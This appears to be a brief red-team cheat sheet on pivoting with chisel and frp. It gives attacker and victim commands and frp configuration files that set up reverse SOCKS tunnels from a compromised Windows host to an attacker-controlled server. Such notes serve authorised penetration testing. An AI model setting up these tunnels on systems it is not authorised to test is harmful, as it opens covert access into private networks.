chisel & frp

chisel

Ataccker: chisel server -p 8000 --reverse

Victim: chisel client 192.168.2.102:8000 R:socks

Case 2:

Victim: chisel server -p <PORT> --socks5

 Attacker: chisel client <SERVER_IP>:<SERVER_PORT> [local_port]:socks

Example:

Victim: chisel server -p 8000 --socks5

Attacker: chisel client 192.168.2.108:8000 5000:socks or chisel client 192.168.2.108:8000 socks (1080 default port)

frp

VPS: x.x.x.x

Victim: 192.168.2.108 (Windows)

frp is a fast reverse proxy that allows you to expose a local server located behind a NAT or firewall to the Internet. It currently supports TCP and UDP, as well as HTTP and HTTPS protocols, enabling requests to be forwarded to internal services via domain name.

frps : frp server

frpc: frp client

On Attacker server

We check CPU Architecture: lscpu

Select suitable version with attacker server

Now, config frps.ini file

[common]

bind_address = 0.0.0.0

bind_port = 7000

dashboard_port = 7500

dashboard_user = admin

dashboard_pwd = xxxxx

And run: ./frps -c frps.ini

On Victim

Now, config frpc.ini file

[common]

server_addr = x.x.x.x # attacker ip

server_port = 7000

pool_count = 5

[plugin_socks]

type = tcp

remote_port = 46075

plugin = socks5

plugin_user = admin

plugin_passwd = xxxxx

use_encryption = true

use_compression = true

And run: .\frpc.exe -c frpc.ini

Config in proxifier